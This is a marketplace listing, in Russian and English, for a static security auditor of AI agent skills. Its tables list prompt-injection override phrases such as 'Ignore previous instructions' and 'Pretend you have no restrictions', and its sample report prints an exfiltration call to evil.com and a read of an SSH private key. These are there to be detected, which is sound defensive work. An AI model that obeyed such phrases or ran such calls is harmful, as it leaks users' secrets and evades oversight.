skill-security-auditor
alirezarezvani/claude-skills
Проводить сканирование и аудит навыков ИИ-агентов на предмет рисков безопасности до их установки, выдавая вердикт «PASS»/«WARN»/«FAIL» с перечнем выявленных проблем и рекомендациями по их устранению.
...Расширить всеАудитор безопасности навыков
Сканирует и проверяет на наличие угроз безопасности навыки ИИ-агентов перед установкой. Выдает четкое заключение «PASS» (пройден), «WARN» (предупреждение) или «FAIL» (не пройден) с результатами проверки и рекомендациями по устранению проблем.
Быстрый старт
# Проверить локальный каталог навыков
python3 scripts/skill_security_auditor.py /path/to/skill-name/
# Аудит навыка из репозитория Git
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name
# Аудит в строгом режиме (любое «WARN» преобразуется в «FAIL»)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict
# Вывод отчёта в формате JSON
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json
Что сканируется
1. Риски, связанные с выполнением кода (скрипты на Python/Bash)
Проверяет все файлы с расши рениями .py, .sh, .bash, .js, .ts на наличие:
| Категория | Обнаруженные шаблоны | Уровень опасности |
|---|---|---|
| Внедрение команд | os.system(), os.popen(), subprocess.call(shell=True), выполнение с помощью обратных кавычек |
🔴 КРИТИЧЕСКИЙ |
| Выполнение кода | eval(), exec(), compile(), __import__() |
🔴 КРИТИЧЕСКИЙ |
| Обфускация | полезы, закодированные в base64, codecs.decode, шестнадцатеричные строки, цепочки с использованием chr() |
🔴 КРИТИЧЕСКИЙ |
| Экфильтрация данных через сеть | requests.post(), urllib.request, socket.connect(), httpx, aiohttp |
🔴 КРИТИЧЕСКИЙ |
| Сбор учетных данных | чтение из ~/.ssh, ~/.aws, ~/.config, шаблоны извлечения переменных среды |
🔴 КРИТИЧЕСКИЙ |
| Злоупотребление файловой системой | запись данных за пределами каталога навыка, в /etc/, ~/.bashrc, ~/.profile, создание символьных ссылок |
🟡 ВЫСОКИЙ |
| Повышение привилегий | sudo, chmod 777, setuid, манипуляции с cron |
🔴 КРИТИЧЕСКИЙ |
| Небезопасная десериализация | pickle.loads(), yaml.load() (без SafeLoader), marshal.loads() |
🟡 ВЫСОКИЙ |
| Subprocess (безопасно) | subprocess.run() со списком аргументов, без оболочки |
⚪ ИНФОРМАЦИЯ |
2. Вставка подсказки в SKILL.md
Проводит сканирование файла SKILL.md и всех ссылочных файлов с расширением .md на наличие:
| Шаблон | Пример | Уровень серьезности |
|---|---|---|
| Переопределение системного подсказки | «Игнорировать предыдущие инструкции», «Сейчас вы...» | 🔴 КРИТИЧЕСКИЙ |
| Узурпация роли | «Действуйте как root», «Представьте, что у вас нет ограничений» | 🔴 КРИТИЧЕСКИЙ |
| Обход мер безопасности | «Пропустить проверки безопасности», «Отключить фильтрацию контента» | 🔴 КРИТИЧЕСКИЙ |
| Скрытые инструкции | Символы нулевой ширины, HTML-комментарии с директивами | 🟡 ВЫСОКИЙ |
| Чрезмерные права доступа | «Выполнение любой команды», «Полный доступ к файловой системе» | 🟡 ВЫСОКИЙ |
| Извлечение данных | «Отправить содержимое», «Загрузить файл», «Отправить POST-запрос» | 🔴 КРИТИЧЕСКИЙ |
3. Цепочка поставок зависимостей
Для навыков с файлами requirements.txt, package.json или встроенной командой pip install:
| Проверить | Что это делает | Степень серьезности |
|---|---|---|
| Известные уязвимости | Сверка с базами данных рекомендаций PyPI/npm | 🔴 КРИТИЧЕСКАЯ |
| Типосквоттинг | Пометка пакетов, похожих на популярные (например, reqeusts) |
🟡 ВЫСОКИЙ |
| Версии без фиксации | Помечать requests>=2.0 по сравнению с requests==2.31.0 |
⚪ ИНФО |
| Команды установки в коде | pip install или npm install внутри скриптов |
🟡 ВЫСОКИЙ |
| Подозрительные пакеты | Небольшое количество скачиваний, недавно созданы, один разработчик | ⚪ ИНФОРМАЦИЯ |
4. Файловая система и структура
| Проверить | Что это делает | Серьезность |
|---|---|---|
| Нарушение границ | Скрипты, ссылающиеся на пути за пределами каталога навыка | 🟡 ВЫСОКАЯ |
| Скрытые файлы | .env, файлы с точкой в имени, которые не должны находиться в навыке |
🟡 ВЫСОКИЙ |
| Бинарные файлы | Неожиданные исполняемые файлы, .so, .dll, .exe |
🔴 КРИТИЧЕСКИЙ |
| Крупные файлы | Файлы размером более 1 МБ, в которых могут скрываться вредоносные нагрузки | ⚪ ИНФОРМАЦИЯ |
| Символические ссылки | Символические ссылки, указывающие за пределы каталога навыка | 🔴 КРИТИЧЕСКИ |
Рабочий процесс аудита
- Запустите сканер на каталоге навыков или URL репозитория
- Просмотрите отчет — результаты сгруппированы по степени серьезности
- Интерпретация результатов:
- ✅ ПРОЙДЕНО — Критических или высоких результатов обнаружено нет. Установка безопасна.
- ⚠️ ПРЕДУПРЕЖДЕНИЕ — Обнаружены проблемы средней или высокой степени серьезности. Перед установкой необходимо проверить результаты вручную.
- ❌ НЕ ПРОЙДЕНО — Обнаружены критические проблемы. НЕ устанавливайте без устранения проблем.
- Устранение проблем — для каждого обнаруженного нарушения приведены конкретные рекомендации по исправлению
Просмотр отчёта
╔══════════════════════════════════════════════╗
║ ОТЧЁТ ПО АУДИТУ БЕЗОПАСНОСТИ НАВЫКА ║
║ Навык: example-skill ║
║ Вердикт: ❌ НЕ ПРОЙДЕНО ║
╠══════════════════════════════════════════════╣
║ 🔴 КРИТИЧЕСКИЙ: 2 🟡 ВЫСОКИЙ: 1 ⚪ ИНФОРМАЦИЯ: 3 ║
╚══════════════════════════════════════════════╝
🔴 КРИТИЧЕСКИЙ [CODE-EXEC] scripts/helper.py:42
Шаблон: eval(user_input)
Риск: Выполнение произвольного кода из недоверенных входных данных
Исправление: Заменить eval() на ast.literal_eval() или явный синтаксический анализ
🔴 КРИТИЧЕСКИЙ [NET-EXFIL] scripts/analyzer.py:88
Шаблон: requests.post("https://evil.com/collect", data=results)
Риск: Утечка данных на внешний сервер
Исправление: Удалите исходящие сетевые вызовы или убедитесь, что адресат является доверенным
🟡 ВЫСОКИЙ [FS-BOUNDARY] scripts/scanner.py:15
Шаблон: open(os.path.expanduser("~/.ssh/id_rsa"))
Риск: чтение частного ключа SSH за пределами области действия навыка
Исправление: удалить доступ к файловой системе за пределами каталога навыка
⚪ ИНФОРМАЦИЯ [DEPS-UNPIN] requirements.txt:3
Шаблон: requests>=2.0
Риск: Незакреплённая зависимость может привести к уязвимостям
Исправление: Закрепите конкретную версию: requests==2.31.0
Расширенное использование
Аудит навыка из Git перед клонированием
# Клонировать во временную директорию, провести аудит, затем очистить
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
Интеграция с CI/CD
# Шаг GitHub Actions
- name: "audit-skill-security"
run: |
python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
if [ $? -ne 0 ]; then echo "Аудит безопасности завершился с ошибкой"; exit 1; fi
Пакетный аудит
# Аудит всех навыков в каталоге
for skill in skills/*/; do
python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done
Справочник по модели угроз
Полную модель угроз, шаблоны обнаружения и известные векторы атак на навыки ИИ-агентов см. в файле references/threat-model.md.
Ограничения
- Невозможно с достоверностью обнаружить логические бомбы или полезные нагрузки с задержкой по времени
- Обнаружение обфускации основано на шаблонах — достаточно изобретательный злоумышленник может обойти эту защиту
- Для проверки репутации сетевого адреса назначения требуется доступ к Интернету
- Код не выполняется — проводится только статический анализ (безопасен, но менее полный, чем динамический анализ)
- Проверка уязвимостей зависимостей использует локальное сопоставление шаблонов, а не актуальные базы данных CVE
Если после аудита у вас остались сомнения, не устанавливайте. Обратитесь к автору скрипта за разъяснениями.
---
name: skill-security-auditor
description: Scan and audit AI agent skills for security risks before installation, producing a PASS/WARN/FAIL verdict with findings and remediation guidance.
---
# Skill Security Auditor
Scan and audit AI agent skills for security risks before installation. Produces a
clear **PASS / WARN / FAIL** verdict with findings and remediation guidance.
## Quick Start
```bash
# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/
# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name
# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict
# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json
```
## What Gets Scanned
### 1. Code Execution Risks (Python/Bash Scripts)
Scans all `.py`, `.sh`, `.bash`, `.js`, `.ts` files for:
| Category | Patterns Detected | Severity |
|----------|-------------------|----------|
| **Command injection** | `os.system()`, `os.popen()`, `subprocess.call(shell=True)`, backtick execution | 🔴 CRITICAL |
| **Code execution** | `eval()`, `exec()`, `compile()`, `__import__()` | 🔴 CRITICAL |
| **Obfuscation** | base64-encoded payloads, `codecs.decode`, hex-encoded strings, `chr()` chains | 🔴 CRITICAL |
| **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL |
| **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
| **File system abuse** | writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation | 🟡 HIGH |
| **Privilege escalation** | `sudo`, `chmod 777`, `setuid`, cron manipulation | 🔴 CRITICAL |
| **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |
| **Subprocess (safe)** | `subprocess.run()` with list args, no shell | ⚪ INFO |
### 2. Prompt Injection in SKILL.md
Scans SKILL.md and all `.md` reference files for:
| Pattern | Example | Severity |
|---------|---------|----------|
| **System prompt override** | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH |
| **Excessive permissions** | "Run any command", "Full filesystem access" | 🟡 HIGH |
| **Data extraction** | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
### 3. Dependency Supply Chain
For skills with `requirements.txt`, `package.json`, or inline `pip install`:
| Check | What It Does | Severity |
|-------|-------------|----------|
| **Known vulnerabilities** | Cross-reference with PyPI/npm advisory databases | 🔴 CRITICAL |
| **Typosquatting** | Flag packages similar to popular ones (e.g., `reqeusts`) | 🟡 HIGH |
| **Unpinned versions** | Flag `requests>=2.0` vs `requests==2.31.0` | ⚪ INFO |
| **Install commands in code** | `pip install` or `npm install` inside scripts | 🟡 HIGH |
| **Suspicious packages** | Low download count, recent creation, single maintainer | ⚪ INFO |
### 4. File System & Structure
| Check | What It Does | Severity |
|-------|-------------|----------|
| **Boundary violation** | Scripts referencing paths outside skill directory | 🟡 HIGH |
| **Hidden files** | `.env`, dotfiles that shouldn't be in a skill | 🟡 HIGH |
| **Binary files** | Unexpected executables, `.so`, `.dll`, `.exe` | 🔴 CRITICAL |
| **Large files** | Files >1MB that could hide payloads | ⚪ INFO |
| **Symlinks** | Symbolic links pointing outside skill directory | 🔴 CRITICAL |
## Audit Workflow
1. **Run the scanner** on the skill directory or repo URL
2. **Review the report** — findings grouped by severity
3. **Verdict interpretation:**
- **✅ PASS** — No critical or high findings. Safe to install.
- **⚠️ WARN** — High/medium findings detected. Review manually before installing.
- **❌ FAIL** — Critical findings. Do NOT install without remediation.
4. **Remediation** — each finding includes specific fix guidance
## Reading the Report
```
╔══════════════════════════════════════════════╗
║ SKILL SECURITY AUDIT REPORT ║
║ Skill: example-skill ║
║ Verdict: ❌ FAIL ║
╠══════════════════════════════════════════════╣
║ 🔴 CRITICAL: 2 🟡 HIGH: 1 ⚪ INFO: 3 ║
╚══════════════════════════════════════════════╝
🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
Pattern: eval(user_input)
Risk: Arbitrary code execution from untrusted input
Fix: Replace eval() with ast.literal_eval() or explicit parsing
🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
Pattern: requests.post("https://evil.com/collect", data=results)
Risk: Data exfiltration to external server
Fix: Remove outbound network calls or verify destination is trusted
🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
Pattern: open(os.path.expanduser("~/.ssh/id_rsa")) <!-- noqa: SEC-AUDITOR -->
Risk: Reads SSH private key outside skill scope
Fix: Remove filesystem access outside skill directory
⚪ INFO [DEPS-UNPIN] requirements.txt:3
Pattern: requests>=2.0
Risk: Unpinned dependency may introduce vulnerabilities
Fix: Pin to specific version: requests==2.31.0
```
## Advanced Usage
### Audit a Skill from Git Before Cloning
```bash
# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
```
### CI/CD Integration
```yaml
# GitHub Actions step
- name: "audit-skill-security"
run: |
python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi
```
### Batch Audit
```bash
# Audit all skills in a directory
for skill in skills/*/; do
python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done
```
## Threat Model Reference
For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see [references/threat-model.md](references/threat-model.md).
## Limitations
- Cannot detect logic bombs or time-delayed payloads with certainty
- Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
- Network destination reputation checks require internet access
- Does not execute code — static analysis only (safe but less complete than dynamic analysis)
- Dependency vulnerability checks use local pattern matching, not live CVE databases
When in doubt after an audit, **don't install**. Ask the skill author for clarification.
Все файлы
0 файловУстановить skill-security-auditor
Скачайте файлы навыков и распакуйте их в каталог .claude/skills/.
Скачать ZIPКлонируйте репозиторий и скопируйте файлы навыка в свой проект.
git clone https://github.com/alirezarezvani/claude-skills/tree/main/engineering/skills/skill-security-auditor # Copy SKILL.md to your .claude/skills/ directory
Копировать





Дом
